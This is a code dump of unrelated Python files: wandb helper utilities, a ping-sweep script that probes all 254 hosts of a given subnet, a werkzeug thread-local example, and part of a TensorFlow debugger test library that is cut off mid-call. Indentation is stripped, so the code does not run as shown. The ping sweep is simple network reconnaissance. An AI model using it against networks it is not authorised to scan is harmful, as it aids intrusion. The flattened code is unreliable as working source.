input_fn = input
prompt = term.LOG_STRING
if input_timeout:
# delayed import to mitigate risk of timed_input complexity
from wandb.sdk.lib import timed_input
input_fn = functools.partial(timed_input.timed_input, timeout=input_timeout)
# timed_input doesnt handle enhanced prompts
if platform.system() == "Windows":
prompt = "wandb"
text = f"{prompt}: Enter your choice: "
if input_fn == input:
choice = input_fn(text)
else:
choice = input_fn(text, jupyter=jupyter)
return choice
def prompt_choices(
choices, allow_manual=False, input_timeout: int = None, jupyter: bool = False,
):
"""Allow a user to choose from a list of options"""
for i, choice in enumerate(choices):
wandb.termlog("(%i) %s" % (i + 1, choice))
idx = -1
while idx < 0 or idx > len(choices) - 1:
choice = _prompt_choice(input_timeout=input_timeout, jupyter=jupyter)
if not choice:
continue
idx = -1
try:
idx = int(choice) - 1
except ValueError:
pass
if idx < 0 or idx > len(choices) - 1:
wandb.termwarn("Invalid choice")
result = choices[idx]
wandb.termlog("You chose '%s'" % result)
return result
def guess_data_type(shape, risky=False):
"""Infer the type of data based on the shape of the tensors
Arguments:
risky(bool): some guesses are more likely to be wrong.
"""
# (samples,) or (samples,logits)
if len(shape) in (1, 2):
return "label"
# Assume image mask like fashion mnist: (no color channel)
# This is risky because RNNs often have 3 dim tensors: batch, time, channels
if risky and len(shape) == 3:
return "image"
if len(shape) == 4:
if shape[-1] in (1, 3, 4):
# (samples, height, width, Y \ RGB \ RGBA)
return "image"
else:
# (samples, height, width, logits)
return "segmentation_mask"
return None
def download_file_from_url(dest_path, source_url, api_key=None):
response = requests.get(source_url, auth=("api", api_key), stream=True, timeout=5)
response.raise_for_status()
if os.sep in dest_path:
mkdir_exists_ok(os.path.dirname(dest_path))
with fsync_open(dest_path, "wb") as file:
for data in response.iter_content(chunk_size=1024):
file.write(data)
def isatty(ob):
return hasattr(ob, "isatty") and ob.isatty()
def to_human_size(bytes, units=None):
units = units or POW_10_BYTES
unit, value = units[0]
factor = round(float(bytes) / value, 1)
return (
"{}{}".format(factor, unit)
if factor < 1024 or len(units) == 1
else to_human_size(bytes, units[1:])
)
def from_human_size(size, units=None):
units = {unit.upper(): value for (unit, value) in units or POW_10_BYTES}
regex = re.compile(
r"(\d+\.?\d*)\s*({})?".format("|".join(units.keys())), re.IGNORECASE
)
match = re.match(regex, size)
if not match:
raise ValueError("Size must be of the form `10`, `10B` or `10 B`.")
factor, unit = (
float(match.group(1)),
units[match.group(2).upper()] if match.group(2) else 1,
)
return int(factor * unit)
def auto_project_name(program):
# if we're in git, set project name to git repo name + relative path within repo
root_dir = wandb.wandb_sdk.lib.git.GitRepo().root_dir
if root_dir is None:
return "uncategorized"
# On windows, GitRepo returns paths in unix style, but os.path is windows
# style. Coerce here.
root_dir = to_native_slash_path(root_dir)
repo_name = os.path.basename(root_dir)
if program is None:
return repo_name
if not os.path.isabs(program):
program = os.path.join(os.curdir, program)
prog_dir = os.path.dirname(os.path.abspath(program))
if not prog_dir.startswith(root_dir):
return repo_name
project = repo_name
sub_path = os.path.relpath(prog_dir, root_dir)
if sub_path != ".":
project += "-" + sub_path
return project.replace(os.sep, "_")
def parse_sweep_id(parts_dict):
"""In place parse sweep path from parts dict.
Arguments:
parts_dict (dict): dict(entity=,project=,name=). Modifies dict inplace.
Returns:
None or str if there is an error
"""
entity = None
project = None
sweep_id = parts_dict.get("name")
if not isinstance(sweep_id, six.string_types):
return "Expected string sweep_id"
sweep_split = sweep_id.split("/")
if len(sweep_split) == 1:
pass
elif len(sweep_split) == 2:
split_project, sweep_id = sweep_split
project = split_project or project
elif len(sweep_split) == 3:
split_entity, split_project, sweep_id = sweep_split
project = split_project or project
entity = split_entity or entity
else:
return (
"Expected sweep_id in form of sweep, project/sweep, or entity/project/sweep"
)
parts_dict.update(dict(name=sweep_id, project=project, entity=entity))
def to_forward_slash_path(path):
if platform.system() == "Windows":
path = path.replace("\\", "/")
return path
def to_native_slash_path(path):
return path.replace("/", os.sep)
def bytes_to_hex(bytestr):
# Works in python2 / python3
return codecs.getencoder("hex")(bytestr)[0].decode("ascii")
def check_and_warn_old(files):
if "wandb-metadata.json" in files:
wandb.termwarn("These runs were logged with a previous version of wandb.")
wandb.termwarn(
"Run pip install wandb<0.10.0 to get the old library and sync your runs."
)
return True
return False
class ImportMetaHook:
def __init__(self):
self.modules = {}
self.on_import = {}
def add(self, fullname, on_import):
self.on_import.setdefault(fullname, []).append(on_import)
def install(self):
sys.meta_path.insert(0, self)
def uninstall(self):
sys.meta_path.remove(self)
def find_module(self, fullname, path=None):
if fullname in self.on_import:
return self
def load_module(self, fullname):
self.uninstall()
mod = importlib.import_module(fullname)
self.install()
self.modules[fullname] = mod
on_imports = self.on_import.get(fullname)
if on_imports:
for f in on_imports:
f()
return mod
def get_modules(self):
return tuple(self.modules)
def get_module(self, module):
return self.modules[module]
_import_hook = None
def add_import_hook(fullname, on_import):
global _import_hook
if _import_hook is None:
_import_hook = ImportMetaHook()
_import_hook.install()
_import_hook.add(fullname, on_import)
def b64_to_hex_id(id_string):
return binascii.hexlify(base64.standard_b64decode(str(id_string))).decode("utf-8")
def hex_to_b64_id(encoded_string):
return base64.standard_b64encode(binascii.unhexlify(encoded_string)).decode("utf-8")
def host_from_path(path):
"""returns the host of the path"""
url = urllib.parse.urlparse(path)
return url.netloc
def uri_from_path(path):
"""returns the URI of the path"""
url = urllib.parse.urlparse(path)
return url.path if url.path[0] != "/" else url.path[1:]
def is_unicode_safe(stream):
"""returns true if the stream supports UTF-8"""
if not hasattr(stream, "encoding"):
return False
return stream.encoding == "UTF-8"
def _has_internet():
"""Attempts to open a DNS connection to Googles root servers"""
try:
s = socket.create_connection(("8.8.8.8", 53), 0.5)
s.close()
return True
except OSError:
return False
def rand_alphanumeric(length=8, rand=None):
rand = rand or random
return "".join(rand.choice("0123456789ABCDEF") for _ in range(length))
@contextlib.contextmanager
def fsync_open(path, mode="w"):
"""
Opens a path for I/O, guaranteeing that the file is flushed and
fsynced when the file's context expires.
"""
with open(path, mode) as f:
yield f
f.flush()
os.fsync(f.fileno())
def _is_kaggle():
return (
os.getenv("KAGGLE_KERNEL_RUN_TYPE") is not None
or "kaggle_environments" in sys.modules # noqa: W503
)
def is_numeric_array(array):
return np.asarray(array).dtype.kind in NUMERIC_KINDS
def _is_likely_kaggle():
# Telemetry to mark first runs from Kagglers.
return (
_is_kaggle()
or os.path.exists(
os.path.expanduser(os.path.join("~", ".kaggle", "kaggle.json"))
)
or "kaggle" in sys.modules
)
def _is_databricks():
# check if we are running inside a databricks notebook by
# inspecting sys.modules, searching for dbutils and verifying that
# it has the appropriate structure
if "dbutils" in sys.modules:
dbutils = sys.modules["dbutils"]
if hasattr(dbutils, "shell"):
shell = dbutils.shell
if hasattr(shell, "sc"):
sc = shell.sc
return sc.appName == "Databricks Shell"
return False
def sweep_config_err_text_from_jsonschema_violations(violations):
"""Consolidate violation strings from wandb/sweeps describing the ways in which a
sweep config violates the allowed schema as a single string.
Parameters
----------
violations: list of str
The warnings to render.
Returns
-------
violation: str
The consolidated violation text.
"""
violation_base = (
"Malformed sweep config detected! This may cause your sweep to behave in unexpected ways.\n"
"To avoid this, please fix the sweep config schema violations below:"
)
for i, warning in enumerate(violations):
violations[i] = " Violation {}. {}".format(i + 1, warning)
violation = "\n".join([violation_base] + violations)
return violation
def handle_sweep_config_violations(warnings):
"""Render warnings from gorilla describing the ways in which a
sweep config violates the allowed schema as terminal warnings.
Parameters
----------
warnings: list of str
The warnings to render.
"""
warning = sweep_config_err_text_from_jsonschema_violations(warnings)
if len(warnings) > 0:
term.termwarn(warning)
def _log_thread_stacks():
"""Log all threads, useful for debugging."""
thread_map = dict((t.ident, t.name) for t in threading.enumerate())
for thread_id, frame in sys._current_frames().items():
logger.info(
"\n--- Stack for thread {t} {name} ---".format(
t=thread_id, name=thread_map.get(thread_id, "unknown")
)
)
for filename, lineno, name, line in traceback.extract_stack(frame):
logger.info(' File: "%s", line %d, in %s' % (filename, lineno, name))
if line:
logger.info(" Line: %s" % line)
def check_windows_valid_filename(path):
return not bool(re.search(RE_WINFNAMES, path))
def artifact_to_json(artifact) -> Dict[str, Any]:
# public.Artifact has the _sequence name, instances of wandb.Artifact
# just have the name
if hasattr(artifact, "_sequence_name"):
sequence_name = artifact._sequence_name
else:
sequence_name = artifact.name.split(":")[0]
return {
"_type": "artifactVersion",
"_version": "v0",
"id": artifact.id,
"version": artifact.version,
"sequenceName": sequence_name,
"usedAs": artifact._use_as,
}
def check_dict_contains_nested_artifact(d, nested=False):
if isinstance(d, dict):
for _, item in six.iteritems(d):
if isinstance(item, dict):
contains_artifacts = check_dict_contains_nested_artifact(item, True)
if contains_artifacts:
return True
elif (
isinstance(item, wandb.Artifact)
or isinstance(item, wandb.apis.public.Artifact)
) and nested:
return True
return False
|
pingSweep.py
|
#! /bin/python
__author__ = "donutsThatsHowWeGetAnts"
__copyright__ = "Copyright (c) 2018 donutsThatsHowWeGetAnts"
__credits__ = [ "donutsThatsHowWeGetAnts" ]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "donutsThatsHowWeGetAnts"
__email__ = "None"
__status__ = "Production"
import multiprocessing
import subprocess
import os,sys
def ping( j, r ):
DNULL = open(os.devnull, 'w')
while True:
ip = j.get()
if ip is None:
break
try:
subprocess.check_call(['ping', '-c1', ip], stdout=DNULL)
r.put(ip)
except:
pass
def valid_ip(s):
a = s.split('.')
if len(a) != 3:
return False
for i in a:
if not i.isdigit():
return False
octect = int(i)
if octect < 0 or octect > 255:
return False
return True
if __name__ == "__main__":
if valid_ip(sys.argv[1]):
size = 255
jobs = multiprocessing.Queue()
results = multiprocessing.Queue()
pool = [ multiprocessing.Process(target=ping, args=(jobs, results))
for i in range(size) ]
for p in pool:
p.start()
for i in range(1,255):
jobs.put(sys.argv[1] + ".{0}".format(i))
for p in pool:
jobs.put(None)
for p in pool:
p.join()
while not results.empty():
ip = results.get()
print(ip)
else:
print "Usage: " + sys.argv[0] + " IP"
print "Example: " + sys.argv[0] + " 10.11.1"
|
test2.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: test2
Description : 使用Local对象进行线程隔离
Author : pengsheng
date: 2019-04-20
-------------------------------------------------
"""
import threading
import time
from werkzeug.local import Local
new_obj = Local()
new_obj.name = '张三'
def worker():
new_obj.name = '张三风'
print('new thread name = ' + new_obj.name)
new_thread = threading.Thread(target=worker, name='new thread')
new_thread.start()
time.sleep(1)
print('main thread name = ' + new_obj.name)
|
session_debug_testlib.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for debugger functionalities in tf.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import glob
import os
import shutil
import tempfile
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
import tensorflow.python.ops.tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.platform import googletest
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
class _RNNCellForTest(rnn_cell_impl.RNNCell):
"""RNN cell for testing."""
def __init__(self, input_output_size, state_size):
self._input_output_size = input_output_size
self._state_size = state_size
self._w = variables.Variable(1.0, dtype=dtypes.float32, name="w")
@property
def output_size(self):
return self._input_output_size
@property
def state_size(self):
return self._state_size
def __call__(self, input_, state, scope=None):
return (math_ops.multiply(self._w, input_), state)
class SessionDebugTestBase(test_util.TensorFlowTestCase):
"""Base class for unit tests of tfdbg running with tf.Session."""
@classmethod
def setUpClass(cls):
if test.is_gpu_available():
cls._expected_partition_graph_count = 2
cls._expected_num_devices = 2
gpu_name = test_util.gpu_device_name()
cls._main_device = "/job:localhost/replica:0/task:0" + gpu_name
else:
cls._expected_partition_graph_count = 1
cls._expected_num_devices = 1
cls._main_device = "/job:localhost/replica:0/task:0/cpu:0"
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
self._dump_root = tempfile.mkdtemp()
def tearDown(self):
ops.reset_default_graph()
# Tear down temporary dump directory.
if os.path.isdir(self._dump_root):
shutil.rmtree(self._dump_root)
def _debug_urls(self, run_number=None):
raise NotImplementedError(
"_debug_urls() method is not implemented in the base test class.")
def _debug_dump_dir(self, run_number=None):
raise NotImplementedError(
"_debug_dump_dir() method is not implemented in the base test class.")
def _debug_run_and_get_dump(self,
sess,
fetches,
feed_dict=None,
debug_ops="DebugIdentity",
tolerate_debug_op_creation_failures=False,
global_step=-1,
validate=True,
expected_partition_graph_count=None):
"""Run fetches with debugging and obtain DebugDumpDir.
Args:
sess: the tf.Session to be used.
fetches: fetches of the Session.run().
feed_dict: feed dict for the Session.run().
debug_ops: name(s) of the debug ops to be used.
tolerate_debug_op_creation_failures: whether to tolerate debug op
creation failures.
global_step: Optional global step.
validate: whether to validate dumped tensors against graph.
expected_partition_graph_count: optional count of partition graphs to
assert on.
Returns:
1. Return values of the Session.run().
2. The DebugDumpDir object from the debugged run().
"""
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=debug_ops,
debug_urls=self._debug_urls(),
tolerate_debug_op_creation_failures=tolerate_debug_op_creation_failures,
global_step=global_step)
run_metadata = config_pb2.RunMetadata()
run_output = sess.run(fetches,
feed_dict=feed_dict,
options=run_options,
run_metadata=run_metadata)
if expected_partition_graph_count is not None:
self.assertEqual(expected_partition_graph_count,
len(run_metadata.partition_graphs))
return run_output, debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs,
validate=validate)
def _generate_dump_from_simple_addition_graph(self):
with session.Session() as sess:
u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
v_init_val = np.array([[2.0], [-1.0]])
# Use node names with overlapping namespace (i.e., parent directory) to
# test concurrent, non-racing directory creation.
u_name = "u"
v_name = "v"
w_name = "w"
u_init = constant_op.constant(u_init_val, shape=[2, 2])
u = variables.Variable(u_init, name=u_name)
v_init = constant_op.constant(v_init_val, shape=[2, 1])
v = variables.Variable(v_init, name=v_name)
w = math_ops.matmul(u, v, name=w_name)
u.initializer.run()
v.initializer.run()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = "file://%s" % self._dump_root
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % u_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for v.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % v_name, 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
# Invoke Session.run().
sess.run(w, options=run_options, run_metadata=run_metadata)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
simple_add_results = collections.namedtuple("SimpleAddResults", [
"u_init_val", "v_init_val", "u", "v", "w", "u_name", "v_name", "w_name",
"dump"
])
return simple_add_results(u_init_val, v_init_val, u, v, w, u_name, v_name,
w_name, dump)
def testCopyNodesHaveCorrectDebugOpsAndURLsAttributeValues(self):
with session.Session() as sess:
u = variables.Variable(2.1, name="u")
v = variables.Variable(20.0, name="v")
w = math_ops.multiply(u, v, name="w")
sess.run(variables.global_variables_initializer())
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
debug_utils.add_debug_tensor_watch(
run_options,
"u",
0, ["DebugNumericSummary(gated_grpc=True)", "DebugIdentity"],
debug_urls=debug_urls)
debug_utils.add_debug_tensor_watch(
run_options, "v", 0, ["DebugNumericSummary"], debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
r = sess.run(w, options=run_options, run_metadata=run_metadata)
self.assertAllClose(42.0, r)
u_copy_node_def = None
v_copy_node_def = None
for partition_graph in run_metadata.partition_graphs:
for node_def in partition_graph.node:
if debug_data.is_copy_node(node_def.name):
if node_def.name == "__copy_u_0":
u_copy_node_def = node_def
elif node_def.name == "__copy_v_0":
v_copy_node_def = node_def
self.assertIsNotNone(u_copy_node_def)
debug_ops_spec = u_copy_node_def.attr["debug_ops_spec"].list.s
self.assertEqual(2, len(debug_ops_spec))
self.assertEqual("DebugNumericSummary;%s;1" % debug_urls[0],
debug_ops_spec[0].decode("utf-8"))
self.assertEqual("DebugIdentity;%s;0" % debug_urls[0],
debug_ops_spec[1].decode("utf-8"))
self.assertIsNotNone(v_copy_node_def)
debug_ops_spec = v_copy_node_def.attr["debug_ops_spec"].list.s
self.assertEqual(1, len(debug_ops_spec))
self.assertEqual("DebugNumericSummary;%s;0" % debug_urls[0],
debug_ops_spec[0].decode("utf-8"))
def testConcurrentDumpingToPathsWithOverlappingParentDirsWorks(self):
results = self._generate_dump_from_simple_addition_graph()
self.assertTrue(results.dump.loaded_partition_graphs())
# Since global_step is not explicitly specified, it should take its default
# value: -1.
self.assertEqual(-1, results.dump.core_metadata.global_step)
self.assertGreaterEqual(results.dump.core_metadata.session_run_index, 0)
self.assertGreaterEqual(results.dump.core_metadata.executor_step_index, 0)
self.assertEqual([], results.dump.core_metadata.input_names)
self.assertEqual([results.w.name], results.dump.core_metadata.output_names)
self.assertEqual([], results.dump.core_metadata.target_nodes)
# Verify the dumped tensor values for u and v.
self.assertEqual(2, results.dump.size)
self.assertAllClose([results.u_init_val],
results.dump.get_tensors("%s/read" % results.u_name, 0,
"DebugIdentity"))
self.assertAllClose([results.v_init_val],
results.dump.get_tensors("%s/read" % results.v_name, 0,
"DebugIdentity"))
self.assertGreaterEqual(
results.dump.get_rel_timestamps("%s/read" % results.u_name, 0,
"DebugIdentity")[0], 0)
self.assertGreaterEqual(
results.dump.get_rel_timestamps("%s/read" % results.v_name, 0,
"DebugIdentity")[0], 0)
self.assertGreater(
results.dump.get_dump_sizes_bytes("%s/read" % results.u_name, 0,
"DebugIdentity")[0], 0)
self.assertGreater(
results.dump.get_dump_sizes_bytes("%s/read" % results.v_name, 0,
"DebugIdentity")[0], 0)
def testGetOpTypeWorks(self):
results = self._generate_dump_from_simple_addition_graph()
self.assertEqual(results.u.op.type,
results.dump.node_op_type(results.u_name))
self.assertIn(results.v.op.type, results.dump.node_op_type(results.v_name))
self.assertIn(results.w.op.type, results.dump.node_op_type(results.w_name))
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
results.dump.node_op_type("foo_bar")
def testDumpStringTensorsWorks(self):
with session.Session() as sess:
str1_init_val = np.array(b"abc")
str2_init_val = np.array(b"def")
str1_init = constant_op.constant(str1_init_val)
str2_init = constant_op.constant(str2_init_val)
str1_name = "str1"
str2_name = "str2"
str1 = variables.Variable(str1_init, name=str1_name)
str2 = variables.Variable(str2_init, name=str2_name)
# Concatenate str1 and str2
str_concat = math_ops.add(str1, str2, name="str_concat")
str1.initializer.run()
str2.initializer.run()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % str1_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for v.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % str2_name, 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
sess.run(str_concat, options=run_options, run_metadata=run_metadata)
# String ops are located on CPU.
self.assertEqual(1, len(run_metadata.partition_graphs))
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
self.assertIn(str1_name, dump.nodes())
self.assertIn(str2_name, dump.nodes())
self.assertEqual(2, dump.size)
self.assertEqual([str1_init_val],
dump.get_tensors("%s/read" % str1_name, 0,
"DebugIdentity"))
self.assertEqual([str2_init_val],
dump.get_tensors("%s/read" % str2_name, 0,
"DebugIdentity"))
self.assertGreaterEqual(
dump.get_rel_timestamps("%s/read" % str1_name, 0, "DebugIdentity")[0],
0)
self.assertGreaterEqual(
dump.get_rel_timestamps("%s/read" % str2_name, 0, "DebugIdentity")[0],
0)
self.assertGreater(
dump.get_dump_sizes_bytes("%s/read" % str1_name, 0,
"DebugIdentity")[0], 0)
self.assertGreater(
dump.get_dump_sizes_bytes("%s/read" % str2_name, 0,
"DebugIdentity")[0], 0)
def testDumpUninitializedVariable(self):
op_namespace = "testDumpUninitializedVariable"
with session.Session() as sess:
u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
s_init_val = b"str1"
u_name = "%s/u" % op_namespace
s_name = "%s/s" % op_namespace
u_init = constant_op.constant(u_init_val, shape=[2, 2])
u = variables.Variable(u_init, name=u_name)
s_init = constant_op.constant(s_init_val)
s = variables.Variable(s_init, name=s_name)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, "%s" % u_name, 0, debug_urls=debug_urls)
debug_utils.add_debug_tensor_watch(
run_options, "%s" % s_name, 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
# Initialize u and s.
sess.run(variables.global_variables_initializer(),
options=run_options,
run_metadata=run_metadata)
# Verify the dump file for the uninitialized value of u.
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
self.assertEqual(2, dump.size)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
# Verify that the variable is properly initialized by the run() call.
u_vals = dump.get_tensors(u_name, 0, "DebugIdentity")
s_vals = dump.get_tensors(s_name, 0, "DebugIdentity")
self.assertEqual(1, len(u_vals))
self.assertIsInstance(u_vals[0], debug_data.InconvertibleTensorProto)
self.assertFalse(u_vals[0].initialized)
self.assertEqual(1, len(s_vals))
self.assertIsInstance(s_vals[0], debug_data.InconvertibleTensorProto)
self.assertFalse(s_vals[0].initialized)
# Call run() again, to check that u is initialized properly.
self.assertAllClose(u_init_val, sess.run(u))
self.assertEqual(s_init_val, sess.run(s))
def testDebugWhileLoopGeneratesMultipleDumps(self):
with session.Session() as sess:
num_iter = 10
# "u" is the Variable being updated in the loop.
u_name = "testDumpToFileWhileLoop/u"
u_namespace = u_name.split("/")[0]
u_init_val = np.array(11.0)
u_init = constant_op.constant(u_init_val)
u = variables.Variable(u_init, name=u_name)
# "v" is the increment.
v_name = "testDumpToFileWhileLoop/v"
v_namespace = v_name.split("/")[0]
v_init_val = np.array(2.0)
v_init = constant_op.constant(v_init_val)
v = variables.Variable(v_init, name=v_name)
u.initializer.run()
v.initializer.run()
i = constant_op.constant(0, name="testDumpToFileWhileLoop/i")
def cond(i):
return math_ops.less(i, num_iter)
def body(i):
new_u = state_ops.assign_add(u, v)
new_i = math_ops.add(i, 1)
op = control_flow_ops.group(new_u)
new_i = control_flow_ops.with_dependencies([op], new_i)
return [new_i]
loop = control_flow_ops.while_loop(
cond, body, [i], parallel_iterations=10)
# Create RunOptions for debug-watching tensors
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, u_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for v.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % v_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for while/Identity.
debug_utils.add_debug_tensor_watch(
run_options, "while/Identity", 0, debug_urls=debug_urls)
# Add debug tensor watch for while/Add/y.
debug_utils.add_debug_tensor_watch(
run_options, "while/Add/y", 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
r = sess.run(loop, options=run_options, run_metadata=run_metadata)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
self.assertEqual(num_iter, r)
u_val_final = sess.run(u)
self.assertAllClose(u_init_val + num_iter * v_init_val, u_val_final)
# Verify dump files
self.assertTrue(os.path.isdir(self._dump_root))
u_glob_out = glob.glob(os.path.join(self._dump_root, "*", u_namespace))
v_glob_out = glob.glob(os.path.join(
self._dump_root, "*", v_namespace, "v"))
self.assertTrue(os.path.isdir(u_glob_out[0]))
self.assertTrue(os.path.isdir(v_glob_out[0]))
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
# Expected dumped tensors: u, v/read, 10 iterations of while/Identity,
# and 10 iterations of while/Add/y.
self.assertEqual(1 + 1 + num_iter + num_iter, dump.size)
# Verify tensor values.
self.assertAllClose([u_init_val],
dump.get_tensors(u_name, 0, "DebugIdentity"))
self.assertAllClose([v_init_val],
dump.get_tensors("%s/read" % v_name, 0,
"DebugIdentity"))
while_id_tensors = dump.get_tensors("while/Identity", 0, "DebugIdentity")
self.assertEqual(10, len(while_id_tensors))
for k in xrange(len(while_id_tensors)):
self.assertAllClose(np.array(k), while_id_tensors[k])
# Verify ascending timestamps from the while loops.
while_id_rel_timestamps = dump.get_rel_timestamps("while/Identity", 0,
"DebugIdentity")
while_id_dump_sizes_bytes = dump.get_dump_sizes_bytes("while/Identity", 0,
"DebugIdentity")
self.assertEqual(10, len(while_id_rel_timestamps))
prev_rel_time = 0
prev_dump_size_bytes = while_id_dump_sizes_bytes[0]
for rel_time, dump_size_bytes in zip(while_id_rel_timestamps,
while_id_dump_sizes_bytes):
self.assertGreaterEqual(rel_time, prev_rel_time)
self.assertEqual(dump_size_bytes, prev_dump_size_bytes)
prev_rel_time = rel_time
prev_dump_size_bytes = dump_size_bytes
# Test querying debug watch keys from node name.
watch_keys = dump.debug_watch_keys("while/Identity")
self.assertEqual(["while/Identity:0:DebugIdentity"], watch_keys)
# Test querying debug datum instances from debug watch key.
self.assertEqual(10, len(dump.watch_key_to_data(watch_keys[0])))
self.assertEqual([], dump.watch_key_to_data("foo"))
def testDebugWhileLoopWatchingWholeGraphWorks(self):
with session.Session() as sess:
loop_body = lambda i: math_ops.add(i, 2)
loop_cond = lambda i: math_ops.less(i, 16)
i = constant_op.constant(10, name="i")
loop = control_flow_ops.while_loop(loop_cond, loop_body, [i])
loop_result, dump = self._debug_run_and_get_dump(sess, loop)
self.assertEqual(16, loop_result)
self.assertEqual(
[[10]], dump.get_tensors("while/Enter", 0, "DebugIdentity"))
self.assertEqual(
[[12], [14], [16]],
dump.get_tensors("while/NextIteration", 0, "DebugIdentity"))
def testDebugTrainingDynamicRNNWorks(self):
with session.Session() as sess:
input_size = 3
state_size = 2
time_steps = 4
batch_size = 2
input_values = np.random.randn(time_steps, batch_size, input_size)
sequence_length = np.random.randint(0, time_steps, size=batch_size)
concat_inputs = array_ops.placeholder(
dtypes.float32, shape=(time_steps, batch_size, input_size))
outputs_dynamic, _ = rnn.dynamic_rnn(
_RNNCellForTest(input_size, state_size),
inputs=concat_inputs,
sequence_length=sequence_length,
time_major=True,
dtype=dtypes.float32)
toy_loss = math_ops.reduce_sum(outputs_dynamic * outputs_dynamic)
train_op = gradient_descent.GradientDescentOptimizer(
learning_rate=0.1).minimize(toy_loss, name="train_op")
sess.run(variables.global_variables_initializer())
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph_with_blacklists(
run_options,
sess.graph,
node_name_regex_blacklist="(.*rnn/while/.*|.*TensorArray.*)",
debug_urls=self._debug_urls())
# b/36870549: Nodes with these name patterns need to be excluded from
# tfdbg in order to prevent MSAN warnings of uninitialized Tensors
# under both file:// and grpc:// debug URL schemes.
run_metadata = config_pb2.RunMetadata()
sess.run(train_op, feed_dict={concat_inputs: input_values},
options=run_options, run_metadata=run_metadata)
debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
def testDebugCondWatchingWholeGraphWorks(self):
with session.Session() as sess:
x = variables.Variable(10.0, name="x")
y = variables.Variable(20.0, name="y")
cond = control_flow_ops.cond(
x > y, lambda: math_ops.add(x, 1), lambda: math_ops.add(y, 1))
sess.run(variables.global_variables_initializer())
cond_result, dump = self._debug_run_and_get_dump(sess, cond)
self.assertEqual(21, cond_result)
self.assertAllClose(
[21.0], dump.get_tensors("cond/Merge", 0, "DebugIdentity"))
def testFindNodesWithBadTensorValues(self):
with session.Session() as sess:
u_name = "testFindNodesWithBadTensorValues/u"
v_name = "testFindNodesWithBadTensorValues/v"
w_name = "testFindNodesWithBadTensorValues/w"
x_name = "testFindNodesWithBadTensorValues/x"
y_name = "testFindNodesWithBadTensorValues/y"
z_name = "testFindNodesWithBadTensorValues/z"
u_init = constant_op.constant([2.0, 4.0])
u = variables.Variable(u_init, name=u_name)
v_init = constant_op.constant([2.0, 1.0])
v = variables.Variable(v_init, name=v_name)
# Expected output: [0.0, 3.0]
w = math_ops.subtract(u, v, name=w_name)
# Expected output: [inf, 1.3333]
x = math_ops.div(u, w, name=x_name)
# Expected output: [nan, 4.0]
y = math_ops.multiply(w, x, name=y_name)
z = math_ops.multiply(y, y, name=z_name)
u.initializer.run()
v.initializer.run()
_, dump = self._debug_run_and_get_dump(
sess, z,
